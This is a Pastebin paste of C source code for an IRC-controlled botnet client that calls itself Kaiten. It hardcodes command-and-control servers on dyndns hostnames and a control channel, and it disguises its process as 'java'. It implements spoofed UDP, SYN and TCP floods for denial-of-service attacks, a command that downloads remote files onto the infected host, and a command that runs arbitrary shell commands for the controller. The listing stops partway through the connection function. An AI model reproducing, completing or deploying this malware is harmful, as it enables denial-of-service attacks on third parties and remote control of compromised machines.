Advertisement
andre11

botnetirc

Jan 28th, 2014
257
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.46 KB | None | 0 0
  1. #define STARTUP 1
  2. #define IDENT 0
  3. #define FAKENAME "java"
  4. #define CHAN "#bin"
  5. #define KEY "bleh"
  6. int numservers=4;
  7. char *servers[] = {
  8. "myfivecents.dyndns-web.com",
  9. "horrayyy.dyndn-web.com",
  10. "bitflipaction.dyndns-remote.com",
  11. "myfivecents.dyndns-web.com",
  12. (void*)0
  13. };
  14. #include <stdarg.h>
  15. #include <errno.h>
  16. #include <stdio.h>
  17. #include <stdlib.h>
  18. #include <string.h>
  19. #include <sys/types.h>
  20. #include <sys/stat.h>
  21. #include <fcntl.h>
  22. #include <strings.h>
  23. #include <netinet/in.h>
  24. #include <unistd.h>
  25. #include <sys/time.h>
  26. #include <sys/socket.h>
  27. #include <signal.h>
  28. #include <arpa/inet.h>
  29. #include <netdb.h>
  30. #include <time.h>
  31. #include <sys/wait.h>
  32. #include <sys/ioctl.h>
  33. int sock,changeservers=0;
  34. char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
  35. unsigned int *pids;
  36. unsigned long spoofs=0, spoofsm=0, numpids=0;
  37. int strwildmatch(const char* pattern, const char* string) {
  38. switch(*pattern) {
  39. case '\0': return *string;
  40. case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
  41. case '?': return !(*string && !strwildmatch(pattern+1, string+1));
  42. default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
  43. }
  44. }
  45. int Send(int sock, char *words, ...) {
  46. static char textBuffer[1024];
  47. va_list args;
  48. va_start(args, words);
  49. vsprintf(textBuffer, words, args);
  50. va_end(args);
  51. return write(sock,textBuffer,strlen(textBuffer));
  52. }
  53. int mfork(char *sender) {
  54. unsigned int parent, *newpids, i;
  55. if (disabled == 1) {
  56. Send(sock,"NOTICE %s :Unable to comply.\n",sender);
  57. return 1;
  58. }
  59. parent=fork();
  60. if (parent <= 0) return parent;
  61. numpids++;
  62. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  63. for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
  64. newpids[numpids-1]=parent;
  65. free(pids);
  66. pids=newpids;
  67. return parent;
  68. }
  69. unsigned long getspoof() {
  70. if (!spoofs) return rand();
  71. if (spoofsm == 1) return ntohl(spoofs);
  72. return ntohl(spoofs+(rand() % spoofsm)+1);
  73. }
  74. void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
  75. char *makestring() {
  76. char *tmp;
  77. int len=(rand()%5)+4,i;
  78. FILE *file;
  79. tmp=(char*)malloc(len+1);
  80. memset(tmp,0,len+1);
  81. if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
  82. else {
  83. int a=((rand()*rand())%45402)+1;
  84. char buf[1024];
  85. for (i=0;i<a;i++) fgets(buf,1024,file);
  86. memset(buf,0,1024);
  87. fgets(buf,1024,file);
  88. filter(buf);
  89. memcpy(tmp,buf,len);
  90. fclose(file);
  91. }
  92. return tmp;
  93. }
  94. void identd() {
  95. int sockname,sockfd,sin_size,tmpsock,i;
  96. struct sockaddr_in my_addr,their_addr;
  97. char szBuffer[1024];
  98. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
  99. my_addr.sin_family = AF_INET;
  100. my_addr.sin_port = htons(113);
  101. my_addr.sin_addr.s_addr = INADDR_ANY;
  102. memset(&(my_addr.sin_zero), 0, 8);
  103. if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
  104. if (listen(sockfd, 1) == -1) return;
  105. if (fork() == 0) return;
  106. sin_size = sizeof(struct sockaddr_in);
  107. if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
  108. for(;;) {
  109. fd_set bla;
  110. struct timeval timee;
  111. FD_ZERO(&bla);
  112. FD_SET(tmpsock,&bla);
  113. timee.tv_sec=timee.tv_usec=60;
  114. if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
  115. if (FD_ISSET(tmpsock,&bla)) break;
  116. }
  117. i = recv(tmpsock,szBuffer,1024,0);
  118. if (i <= 0 || i >= 20) exit(0);
  119. szBuffer[i]=0;
  120. if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
  121. if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
  122. Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
  123. close(tmpsock);
  124. close(sockfd);
  125. exit(0);
  126. }
  127. long pow(long a, long b) {
  128. if (b == 0) return 1;
  129. if (b == 1) return a;
  130. return a*pow(a,b-1);
  131. }
  132. u_short in_cksum(u_short *addr, int len) {
  133. register int nleft = len;
  134. register u_short *w = addr;
  135. register int sum = 0;
  136. u_short answer =0;
  137. while (nleft > 1) {
  138. sum += *w++;
  139. nleft -= 2;
  140. }
  141. if (nleft == 1) {
  142. *(u_char *)(&answer) = *(u_char *)w;
  143. sum += answer;
  144. }
  145. sum = (sum >> 16) + (sum & 0xffff);
  146. sum += (sum >> 16);
  147. answer = ~sum;
  148. return(answer);
  149. }
  150. void get(int sock, char *sender, int argc, char **argv) {
  151. int sock2,i,d;
  152. struct sockaddr_in server;
  153. unsigned long ipaddr;
  154. char buf[1024];
  155. FILE *file;
  156. unsigned char bufm[4096];
  157. if (mfork(sender) != 0) return;
  158. if (argc < 2) {
  159. Send(sock,"NOTICE %s :GET <host> <save as>\n",sender);
  160. exit(0);
  161. }
  162. if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  163. Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
  164. exit(0);
  165. }
  166. if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
  167. else strcpy(buf,argv[1]);
  168. for (i=0;i<strlen(buf) && buf[i] != '/';i++);
  169. buf[i]=0;
  170. server.sin_family = AF_INET;
  171. server.sin_port = htons(80);
  172. if ((ipaddr = inet_addr(buf)) == -1) {
  173. struct hostent *hostm;
  174. if ((hostm=gethostbyname(buf)) == NULL) {
  175. Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
  176. exit(0);
  177. }
  178. memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  179. }
  180. else server.sin_addr.s_addr = ipaddr;
  181. memset(&(server.sin_zero), 0, 8);
  182. if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  183. Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
  184. exit(0);
  185. }
  186. Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
  187. Send(sock,"NOTICE %s :Receiving file.\n",sender);
  188. file=fopen(argv[2],"wb");
  189. while(1) {
  190. int i;
  191. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  192. if (i < 4096) bufm[i]=0;
  193. for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  194. for (d+=4;d<i;d++) fputc(bufm[d],file);
  195. goto done;
  196. }
  197. }
  198. done:
  199. Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]);
  200. while(1) {
  201. int i,d;
  202. if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  203. if (i < 4096) bufm[i]=0;
  204. for (d=0;d<i;d++) fputc(bufm[d],file);
  205. }
  206. fclose(file);
  207. close(sock2);
  208. exit(0);
  209. }
  210. void getspoofs(int sock, char *sender, int argc, char **argv) {
  211. unsigned long a=spoofs,b=spoofs+(spoofsm-1);
  212. if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
  213. else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
  214. }
  215. void version(int sock, char *sender, int argc, char **argv) {
  216. Send(sock,"NOTICE %s :Kaiten wa goraku\n",sender);
  217. }
  218. void nickc(int sock, char *sender, int argc, char **argv) {
  219. if (argc != 1) {
  220. Send(sock,"NOTICE %s :NICK <nick>\n",sender);
  221. return;
  222. }
  223. if (strlen(argv[1]) >= 10) {
  224. Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender);
  225. return;
  226. }
  227. Send(sock,"NICK %s\n",argv[1]);
  228. }
  229. void disable(int sock, char *sender, int argc, char **argv) {
  230. if (argc != 1) {
  231. Send(sock,"NOTICE %s :DISABLE <pass>\n",sender);
  232. Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
  233. return;
  234. }
  235. if (disabled) {
  236. Send(sock,"NOTICE %s :Already disabled.\n",sender);
  237. return;
  238. }
  239. if (strlen(argv[1]) > 254) {
  240. Send(sock,"NOTICE %s :Password too long! > 254\n",sender);
  241. return;
  242. }
  243. disabled=1;
  244. memset(dispass,0,256);
  245. strcpy(dispass,argv[1]);
  246. Send(sock,"NOTICE %s :Disable sucessful.\n");
  247. }
  248. void enable(int sock, char *sender, int argc, char **argv) {
  249. if (argc != 1) {
  250. Send(sock,"NOTICE %s :ENABLE <pass>\n",sender);
  251. Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
  252. return;
  253. }
  254. if (!disabled) {
  255. Send(sock,"NOTICE %s :Already enabled.\n",sender);
  256. return;
  257. }
  258. if (strcasecmp(dispass,argv[1])) {
  259. Send(sock,"NOTICE %s :Wrong password\n",sender);
  260. return;
  261. }
  262. disabled=0;
  263. Send(sock,"NOTICE %s :Password correct.\n",sender);
  264. }
  265. void spoof(int sock, char *sender, int argc, char **argv) {
  266. char ip[256];
  267. int i, num;
  268. unsigned long uip;
  269. if (argc != 1) {
  270. Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
  271. spoofs=0;
  272. spoofsm=0;
  273. return;
  274. }
  275. if (strlen(argv[1]) > 16) {
  276. Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
  277. return;
  278. }
  279. strcpy(ip,argv[1]);
  280. if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
  281. for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
  282. num=-(num-4);
  283. for (i=0;i<num;i++) strcat(ip,".0");
  284. uip=inet_network(ip);
  285. if (num == 0) spoofsm=1;
  286. else spoofsm=pow(256,num);
  287. spoofs=uip;
  288. }
  289. struct iphdr {
  290. unsigned int ihl:4, version:4;
  291. unsigned char tos;
  292. unsigned short tot_len;
  293. unsigned short id;
  294. unsigned short frag_off;
  295. unsigned char ttl;
  296. unsigned char protocol;
  297. unsigned short check;
  298. unsigned long saddr;
  299. unsigned long daddr;
  300. };
  301. struct udphdr {
  302. unsigned short source;
  303. unsigned short dest;
  304. unsigned short len;
  305. unsigned short check;
  306. };
  307. struct tcphdr {
  308. unsigned short source;
  309. unsigned short dest;
  310. unsigned long seq;
  311. unsigned long ack_seq;
  312. unsigned short res1:4, doff:4;
  313. unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
  314. unsigned short window;
  315. unsigned short check;
  316. unsigned short urg_ptr;
  317. };
  318. struct send_tcp {
  319. struct iphdr ip;
  320. struct tcphdr tcp;
  321. char buf[20];
  322. };
  323. struct pseudo_header {
  324. unsigned int source_address;
  325. unsigned int dest_address;
  326. unsigned char placeholder;
  327. unsigned char protocol;
  328. unsigned short tcp_length;
  329. struct tcphdr tcp;
  330. char buf[20];
  331. };
  332. unsigned int host2ip(char *sender,char *hostname) {
  333. static struct in_addr i;
  334. struct hostent *h;
  335. if((i.s_addr = inet_addr(hostname)) == -1) {
  336. if((h = gethostbyname(hostname)) == NULL) {
  337. Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
  338. exit(0);
  339. }
  340. bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
  341. }
  342. return i.s_addr;
  343. }
  344. void udp(int sock, char *sender, int argc, char **argv) {
  345. unsigned int port,i=0;
  346. unsigned long psize,target,secs;
  347. struct sockaddr_in s_in;
  348. struct iphdr *ip;
  349. struct udphdr *udp;
  350. char buf[1500],*str;
  351. int get;
  352. time_t start=time(NULL);
  353. if (mfork(sender) != 0) return;
  354. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  355. if (argc < 3) {
  356. Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
  357. exit(1);
  358. }
  359. target = host2ip(sender,argv[1]);
  360. port = atoi(argv[2]);
  361. secs = atol(argv[3]);
  362. ip=(void*)buf;
  363. udp=(void*)(buf+sizeof(struct iphdr));
  364. str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
  365. memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
  366. Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]);
  367. ip->ihl = 5;
  368. ip->version = 4;
  369. ip->tos = 0;
  370. ip->tot_len = 1500;
  371. ip->frag_off = 0;
  372. ip->protocol = 17;
  373. ip->ttl = 64;
  374. ip->daddr = target;
  375. udp->len = htons(psize);
  376. s_in.sin_family = AF_INET;
  377. s_in.sin_addr.s_addr = target;
  378. for (;;) {
  379. udp->source = rand();
  380. if (port) udp->dest = htons(port);
  381. else udp->dest = rand();
  382. udp->check = in_cksum((u_short *)buf,1500);
  383. ip->saddr = getspoof();
  384. ip->id = rand();
  385. ip->check = in_cksum((u_short *)buf,1500);
  386. s_in.sin_port = udp->dest;
  387. sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
  388. if (i >= 50) {
  389. if (time(NULL) >= start+secs) exit(0);
  390. i=0;
  391. }
  392. i++;
  393. }
  394. }
  395. void pan(int sock, char *sender, int argc, char **argv) {
  396. struct send_tcp send_tcp;
  397. struct pseudo_header pseudo_header;
  398. struct sockaddr_in sin;
  399. unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
  400. unsigned int psize=20, source, dest, check;
  401. unsigned long saddr, daddr,secs;
  402. int get;
  403. time_t start=time(NULL);
  404. if (mfork(sender) != 0) return;
  405. if (argc < 3) {
  406. Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
  407. exit(1);
  408. }
  409. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  410. {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
  411. daddr=host2ip(sender,argv[1]);
  412. secs=atol(argv[3]);
  413. Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
  414. send_tcp.ip.ihl = 5;
  415. send_tcp.ip.version = 4;
  416. send_tcp.ip.tos = 16;
  417. send_tcp.ip.frag_off = 64;
  418. send_tcp.ip.ttl = 64;
  419. send_tcp.ip.protocol = 6;
  420. send_tcp.tcp.ack_seq = 0;
  421. send_tcp.tcp.doff = 10;
  422. send_tcp.tcp.res1 = 0;
  423. send_tcp.tcp.cwr = 0;
  424. send_tcp.tcp.ece = 0;
  425. send_tcp.tcp.urg = 0;
  426. send_tcp.tcp.ack = 0;
  427. send_tcp.tcp.psh = 0;
  428. send_tcp.tcp.rst = 0;
  429. send_tcp.tcp.fin = 0;
  430. send_tcp.tcp.syn = 1;
  431. send_tcp.tcp.window = 30845;
  432. send_tcp.tcp.urg_ptr = 0;
  433. dest=htons(atoi(argv[2]));
  434. while(1) {
  435. source=rand();
  436. if (atoi(argv[2]) == 0) dest=rand();
  437. saddr=getspoof();
  438. send_tcp.ip.tot_len = htons(40+psize);
  439. send_tcp.ip.id = rand();
  440. send_tcp.ip.saddr = saddr;
  441. send_tcp.ip.daddr = daddr;
  442. send_tcp.ip.check = 0;
  443. send_tcp.tcp.source = source;
  444. send_tcp.tcp.dest = dest;
  445. send_tcp.tcp.seq = rand();
  446. send_tcp.tcp.check = 0;
  447. sin.sin_family = AF_INET;
  448. sin.sin_port = dest;
  449. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  450. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  451. check = rand();
  452. send_tcp.buf[9]=((char*)&check)[0];
  453. send_tcp.buf[10]=((char*)&check)[1];
  454. send_tcp.buf[11]=((char*)&check)[2];
  455. send_tcp.buf[12]=((char*)&check)[3];
  456. pseudo_header.source_address = send_tcp.ip.saddr;
  457. pseudo_header.dest_address = send_tcp.ip.daddr;
  458. pseudo_header.placeholder = 0;
  459. pseudo_header.protocol = IPPROTO_TCP;
  460. pseudo_header.tcp_length = htons(20+psize);
  461. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  462. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  463. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
  464. sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  465. if (a >= 50) {
  466. if (time(NULL) >= start+secs) exit(0);
  467. a=0;
  468. }
  469. a++;
  470. }
  471. close(get);
  472. exit(0);
  473. }
  474. void tsunami(int sock, char *sender, int argc, char **argv) {
  475. struct send_tcp send_tcp;
  476. struct pseudo_header pseudo_header;
  477. struct sockaddr_in sin;
  478. unsigned int psize=1400, check,i;
  479. unsigned long saddr, daddr,secs;
  480. int get;
  481. time_t start=time(NULL);
  482. if (mfork(sender) != 0) return;
  483. if (argc < 2) {
  484. Send(sock,"NOTICE %s :TSUNAMI <target> <secs>\n",sender);
  485. exit(1);
  486. }
  487. secs=atol(argv[2]);
  488. if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  489. srand(time(NULL) ^ getpid());
  490. memset(send_tcp.buf,rand(),psize);
  491. daddr=host2ip(sender,argv[1]);
  492. Send(sock,"NOTICE %s :Tsunami heading for %s.\n",sender,argv[1]);
  493. while(1) {
  494. saddr=getspoof();
  495. send_tcp.ip.ihl = 5;
  496. send_tcp.ip.version = 4;
  497. send_tcp.ip.tos = 16;
  498. send_tcp.ip.tot_len = htons(40+psize);
  499. send_tcp.ip.id = rand();
  500. send_tcp.ip.frag_off = 64;
  501. send_tcp.ip.ttl = 64;
  502. send_tcp.ip.protocol = 6;
  503. send_tcp.ip.check = 0;
  504. send_tcp.ip.saddr = saddr;
  505. send_tcp.ip.daddr = daddr;
  506. send_tcp.tcp.source = rand();
  507. send_tcp.tcp.dest = rand();
  508. send_tcp.tcp.seq = rand();
  509. send_tcp.tcp.ack_seq = rand();
  510. send_tcp.tcp.doff = 5;
  511. send_tcp.tcp.res1 = 0;
  512. send_tcp.tcp.cwr = 0;
  513. send_tcp.tcp.ece = 0;
  514. send_tcp.tcp.urg = 0;
  515. send_tcp.tcp.ack = 1;
  516. send_tcp.tcp.psh = 1;
  517. send_tcp.tcp.rst = 0;
  518. send_tcp.tcp.fin = 0;
  519. send_tcp.tcp.syn = 0;
  520. send_tcp.tcp.window = 30845;
  521. send_tcp.tcp.check = 0;
  522. send_tcp.tcp.urg_ptr = 0;
  523. sin.sin_family = AF_INET;
  524. sin.sin_port = send_tcp.tcp.dest;
  525. sin.sin_addr.s_addr = send_tcp.ip.daddr;
  526. send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  527. check = in_cksum((unsigned short *)&send_tcp, 40);
  528. pseudo_header.source_address = send_tcp.ip.saddr;
  529. pseudo_header.dest_address = send_tcp.ip.daddr;
  530. pseudo_header.placeholder = 0;
  531. pseudo_header.protocol = IPPROTO_TCP;
  532. pseudo_header.tcp_length = htons(20+psize);
  533. bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  534. bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  535. send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
  536. sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  537. if (i >= 50) {
  538. if (time(NULL) >= start+secs) break;
  539. i=0;
  540. }
  541. i++;
  542. }
  543. close(get);
  544. exit(0);
  545. }
  546. void unknown(int sock, char *sender, int argc, char **argv) {
  547. int flag=1,fd,i;
  548. unsigned long secs;
  549. char *buf=(char*)malloc(9216);
  550. struct hostent *hp;
  551. struct sockaddr_in in;
  552. time_t start=time(NULL);
  553. if (mfork(sender) != 0) return;
  554. if (argc < 2) {
  555. Send(sock,"NOTICE %s :UNKNOWN <target> <secs>\n",sender);
  556. exit(1);
  557. }
  558. secs=atol(argv[2]);
  559. memset((void*)&in,0,sizeof(struct sockaddr_in));
  560. in.sin_addr.s_addr=host2ip(sender,argv[1]);
  561. in.sin_family = AF_INET;
  562. Send(sock,"NOTICE %s :Unknowning %s.\n",sender,argv[1]);
  563. while(1) {
  564. in.sin_port = rand();
  565. if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
  566. else {
  567. flag=1;
  568. ioctl(fd,FIONBIO,&flag);
  569. sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
  570. close(fd);
  571. }
  572. if (i >= 50) {
  573. if (time(NULL) >= start+secs) break;
  574. i=0;
  575. }
  576. i++;
  577. }
  578. close(fd);
  579. exit(0);
  580. }
  581. void move(int sock, char *sender, int argc, char **argv) {
  582. if (argc < 1) {
  583. Send(sock,"NOTICE %s :MOVE <server>\n",sender);
  584. exit(1);
  585. }
  586. server=strdup(argv[1]);
  587. changeservers=1;
  588. close(sock);
  589. }
  590. void help(int sock, char *sender, int argc, char **argv) {
  591. if (mfork(sender) != 0) return;
  592. Send(sock,"NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls\n",sender); sleep(2);
  593. Send(sock,"NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n",sender); sleep(2);
  594. Send(sock,"NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n",sender); sleep(2);
  595. Send(sock,"NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder\n",sender); sleep(2);
  596. Send(sock,"NOTICE %s :NICK <nick> = Changes the nick of the client\n",sender); sleep(2);
  597. Send(sock,"NOTICE %s :SERVER <server> = Changes servers\n",sender); sleep(2);
  598. Send(sock,"NOTICE %s :GETSPOOFS = Gets the current spoofing\n",sender); sleep(2);
  599. Send(sock,"NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n",sender); sleep(2);
  600. Send(sock,"NOTICE %s :DISABLE = Disables all packeting from this client\n",sender); sleep(2);
  601. Send(sock,"NOTICE %s :ENABLE = Enables all packeting from this client\n",sender); sleep(2);
  602. Send(sock,"NOTICE %s :KILL = Kills the client\n",sender); sleep(2);
  603. Send(sock,"NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n",sender); sleep(2);
  604. Send(sock,"NOTICE %s :VERSION = Requests version of client\n",sender); sleep(2);
  605. Send(sock,"NOTICE %s :KILLALL = Kills all current packeting\n",sender); sleep(2);
  606. Send(sock,"NOTICE %s :HELP = Displays this\n",sender);
  607. Send(sock,"NOTICE %s :IRC <command> = Sends this command to the server\n",sender); sleep(2);
  608. Send(sock,"NOTICE %s :SH <command> = Executes a command\n",sender); sleep(2);
  609. exit(0);
  610. }
  611. void killall(int sock, char *sender, int argc, char **argv) {
  612. unsigned long i;
  613. for (i=0;i<numpids;i++) {
  614. if (pids[i] != 0 && pids[i] != getpid()) {
  615. if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]);
  616. kill(pids[i],9);
  617. }
  618. }
  619. }
  620. void killd(int sock, char *sender, int argc, char **argv) {
  621. if (!disable) kill(0,9);
  622. else Send(sock,"NOTICE %s :Unable to comply.\n");
  623. }
  624. struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
  625. { "TSUNAMI", tsunami },
  626. { "PAN", pan },
  627. { "UDP", udp },
  628. { "UNKNOWN", unknown },
  629. { "NICK", nickc },
  630. { "SERVER", move },
  631. { "GETSPOOFS", getspoofs },
  632. { "SPOOFS", spoof },
  633. { "DISABLE", disable },
  634. { "ENABLE", enable },
  635. { "KILL", killd },
  636. { "GET", get },
  637. { "VERSION", version },
  638. { "KILLALL", killall },
  639. { "HELP", help },
  640. { (char *)0, (void (*)(int,char *,int,char **))0 } };
  641. void _PRIVMSG(int sock, char *sender, char *str) {
  642. int i;
  643. char *to, *message;
  644. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  645. str[i]=0;
  646. to=str;
  647. message=str+i+2;
  648. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  649. sender[i]=0;
  650. if (*message == '!' && !strcasecmp(to,chan)) {
  651. char *params[12], name[1024]={0};
  652. int num_params=0, m;
  653. message++;
  654. for (i=0;i<strlen(message) && message[i] != ' ';i++);
  655. message[i]=0;
  656. if (strwildmatch(message,nick)) return;
  657. message+=i+1;
  658. if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4);
  659. if (!strncmp(message,"SH ",3)) {
  660. char buf[1024];
  661. FILE *command;
  662. if (mfork(sender) != 0) return;
  663. memset(buf,0,1024);
  664. sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
  665. command=popen(buf,"r");
  666. while(!feof(command)) {
  667. memset(buf,0,1024);
  668. fgets(buf,1024,command);
  669. Send(sock,"NOTICE %s :%s\n",sender,buf);
  670. sleep(1);
  671. }
  672. pclose(command);
  673. exit(0);
  674. }
  675. m=strlen(message);
  676. for (i=0;i<m;i++) {
  677. if (*message == ' ' || *message == 0) break;
  678. name[i]=*message;
  679. message++;
  680. }
  681. for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
  682. num_params++;
  683. if (num_params > 10) num_params=10;
  684. params[0]=name;
  685. params[num_params+1]="\0";
  686. m=1;
  687. while (*message != 0) {
  688. message++;
  689. if (m >= num_params) break;
  690. for (i=0;i<strlen(message) && message[i] != ' ';i++);
  691. params[m]=(char*)malloc(i+1);
  692. strncpy(params[m],message,i);
  693. params[m][i]=0;
  694. m++;
  695. message+=i;
  696. }
  697. for (m=0; flooders[m].cmd != (char *)0; m++) {
  698. if (!strcasecmp(flooders[m].cmd,name)) {
  699. flooders[m].func(sock,sender,num_params-1,params);
  700. for (i=1;i<num_params;i++) free(params[i]);
  701. return;
  702. }
  703. }
  704. }
  705. }
  706. void _376(int sock, char *sender, char *str) {
  707. Send(sock,"MODE %s -xi\n",nick);
  708. Send(sock,"JOIN %s :%s\n",chan,key);
  709. Send(sock,"WHO %s\n",nick);
  710. }
  711. void _PING(int sock, char *sender, char *str) {
  712. Send(sock,"PONG %s\n",str);
  713. }
  714. void _352(int sock, char *sender, char *str) {
  715. int i,d;
  716. char *msg=str;
  717. struct hostent *hostm;
  718. unsigned long m;
  719. for (i=0,d=0;d<5;d++) {
  720. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  721. if (i == strlen(str)) return;
  722. }
  723. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  724. msg[i]=0;
  725. if (!strcasecmp(msg,nick) && !spoofsm) {
  726. msg=str;
  727. for (i=0,d=0;d<3;d++) {
  728. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  729. if (i == strlen(str)) return;
  730. }
  731. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  732. msg[i]=0;
  733. if ((m = inet_addr(msg)) == -1) {
  734. if ((hostm=gethostbyname(msg)) == NULL) {
  735. Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
  736. return;
  737. }
  738. memcpy((char*)&m, hostm->h_addr, hostm->h_length);
  739. }
  740. ((char*)&spoofs)[3]=((char*)&m)[0];
  741. ((char*)&spoofs)[2]=((char*)&m)[1];
  742. ((char*)&spoofs)[1]=((char*)&m)[2];
  743. ((char*)&spoofs)[0]=0;
  744. spoofsm=256;
  745. }
  746. }
  747. void _433(int sock, char *sender, char *str) {
  748. free(nick);
  749. nick=makestring();
  750. }
  751. void _NICK(int sock, char *sender, char *str) {
  752. int i;
  753. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  754. sender[i]=0;
  755. if (!strcasecmp(sender,nick)) {
  756. if (*str == ':') str++;
  757. if (nick) free(nick);
  758. nick=strdup(str);
  759. }
  760. }
  761. struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
  762. { "352", _352 },
  763. { "376", _376 },
  764. { "433", _433 },
  765. { "422", _376 },
  766. { "PRIVMSG", _PRIVMSG },
  767. { "PING", _PING },
  768. { "NICK", _NICK },
  769. { (char *)0, (void (*)(int,char *,char *))0 } };
  770. void con() {
  771. struct sockaddr_in srv;
  772. unsigned long ipaddr,start;
  773. int flag;
